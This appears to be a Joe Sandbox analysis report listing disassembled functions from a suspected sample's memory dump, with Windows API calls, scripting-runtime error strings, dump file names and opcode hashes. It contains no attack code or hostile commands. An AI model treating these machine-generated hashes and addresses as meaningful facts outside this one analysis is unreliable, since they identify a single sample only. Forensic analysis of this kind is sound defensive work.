                                                                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6a0645dd0d9bcbe88b4a5bcf93fcc3471aa91acd03af174d930987de0f50f6fa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a030ced68e5579936af14df7014c340d08faf67db11c6da48bc3131763fa54aa
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a0645dd0d9bcbe88b4a5bcf93fcc3471aa91acd03af174d930987de0f50f6fa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE519EB0A103069BDF10CF68D889AAEFBF9AF58314F34811AE912B7291D7719951CF61
                                                                                                                                                                                                                                                                                                                            Function 001D1B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 001D1B35
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 001D1B99
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 001D1BB6
                                                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001D1BC7
                                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 001D1C15
                                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00213287
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1C2D: BeginPath.GDI32(00000000), ref: 001D1C4B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3050599898-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c1a5453f9fcb0dbe25ad3d90a8ce4d905a7805470a068714a1fb2d443a704394
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9d52c06fbf5f7aa15b9a919c02b5aebb45d74db63cd7dd505bc1b5db72b63894
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a5453f9fcb0dbe25ad3d90a8ce4d905a7805470a068714a1fb2d443a704394
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1841C170604305BFD710DF28EC88FA77BE8EB56720F10066AF995862B1C7709D48DB62
                                                                                                                                                                                                                                                                                                                            Function 002686FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00268740
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00268765
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0026877D
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 002687A6
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0024C1F2,00000000), ref: 002687C6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 002687B1
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2294984445-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e24993441da738ef1d051c3b8932fd37fbb75875a6c93c2f22b11aa53be0e730
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 000e3d2e0632a4dbe1503e73fee864858496973c700857846d668ef412acc27d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e24993441da738ef1d051c3b8932fd37fbb75875a6c93c2f22b11aa53be0e730
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A721A175620246DFCB159F38DC48A6AB7A5EB45325F348729F926D21E0EF7098A0CB10
                                                                                                                                                                                                                                                                                                                            Function 0023D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0023D1BE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 407bd8b198412aa0807b29899bb7fcd2b107a5d0d110d75212baf5481e618beb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: de4b6ab7c21c66636b4a29a2c4c46161bf4d0ab5721a356bbd35a0b92d272958
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 407bd8b198412aa0807b29899bb7fcd2b107a5d0d110d75212baf5481e618beb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A11B77567830BBBEB055E94FC82DBA779C9F25760F20002AF549A6181D7F45A504164
                                                                                                                                                                                                                                                                                                                            Function 0023E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 073454b3ad2329b8db997e01abbaf0463aac673c20410d59dfe90e0eb33acbfe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 432648c45cad7448369aabc3bdc7a97a17bab9825b7d3014ba9ed3eb3f31f3c3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 073454b3ad2329b8db997e01abbaf0463aac673c20410d59dfe90e0eb33acbfe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A211E4B191411DBBCF20AB60EC4EEEAB7BCEF15710F010065F605A60D1EFB48A969A61
                                                                                                                                                                                                                                                                                                                            Function 0023F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 571ec7e11caff1cb849d7946023687ae78a9fff70027fe8eee34c94dbdb33b41
                                                                                                                                                                                                                                                                                                                            • Instruction ID: aca2419c13770c6daede1ed3d3ae6edf29b6e134f97b2409e5639e702e576236
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 571ec7e11caff1cb849d7946023687ae78a9fff70027fe8eee34c94dbdb33b41
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 474195A5C1121876CB51EBB8DC86AEFF77DAF15310F508462E618E3121FB34D265C3A6
                                                                                                                                                                                                                                                                                                                            Function 0026379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 002637B7
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 002637BF
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002637CA
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 002637D6
                                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00263812
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00263823
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00266504,?,?,000000FF,00000000,?,000000FF,?), ref: 0026385E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0026387D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1c9e9a34323a9fc24752e731a059ae7ea715492d0c75ebc2ad25522855fdc89a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 051c7bd3a045040286883748ce633c72d89a9244ca5f27eb289b3d80ba6be60f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c9e9a34323a9fc24752e731a059ae7ea715492d0c75ebc2ad25522855fdc89a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5331AE76611218BFEB118F50DC89FEB3BADEF49711F044065FE089B291C6B59C91CBA4
                                                                                                                                                                                                                                                                                                                            Function 00255A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                                            • Opcode ID: aab7b42d1ef133d95239cc054ab239421a33bba75756472cb984ec366c97596d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bf372ba07d5bcd2943db1be98eb6e1c1edd33fa55b26bae390dae70eb518f31c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aab7b42d1ef133d95239cc054ab239421a33bba75756472cb984ec366c97596d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD1C071A2071A9FDF10CFA8C8A5AAEB7B5FF48305F148069ED05AB280E770DD59CB54
                                                                                                                                                                                                                                                                                                                            Function 002118A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0021194E
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002119D1
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00211B7B,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00211A64
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00211A7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00203B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00211B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00211AF7
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00211B22
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00211B2E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5daf8fbe930d7451778abae07c1f0e66624a4a9a8a5c5c8712eb2b44017f15d5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bbbfb9bce3fc17499f4a1456d3e9d1f4e410345440bbe220d67702bc81791f31
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5daf8fbe930d7451778abae07c1f0e66624a4a9a8a5c5c8712eb2b44017f15d5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F591E572E3021B9ADF248E64C891AEE7BF99F29314F184159EA15E7180E774DDF0CB60
                                                                                                                                                                                                                                                                                                                            Function 00254F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 212d04f499392dd09cb6ff1e33b4478ee9a5c45bdee0ace14bebdbaab8381533
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 91d5510c6b511356dcc29af600a7444974c3402a9dda8a63890ce33c126038eb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212d04f499392dd09cb6ff1e33b4478ee9a5c45bdee0ace14bebdbaab8381533
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F91B570A20629ABDF20CFA5CC54FAF7BB8EF45315F108519F905AB280D7709959CFA4
                                                                                                                                                                                                                                                                                                                            Function 00241B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00241C1B
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241C43
                                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00241C67
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241C97
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241D1E
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241D83
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00241DEF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 66266a598a4aaf821eb3240eb0554a5f1b0453a53bf4cc89365d1e46153d33ab
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 03cefb8a1fab103537c827149b0b550955e0e5785ef0946967dbced21ddaf0e8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66266a598a4aaf821eb3240eb0554a5f1b0453a53bf4cc89365d1e46153d33ab
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C91F1B5A20219EFDB099F94C8C5BBEB7B4FF05715F108026E900EB291D774E9A0CB51
                                                                                                                                                                                                                                                                                                                            Function 002543A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 002543C8
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 002544D7
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002544E7
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0025467C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024169E: VariantInit.OLEAUT32(00000000), ref: 002416DE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024169E: VariantCopy.OLEAUT32(?,?), ref: 002416E7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024169E: VariantClear.OLEAUT32(?), ref: 002416F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
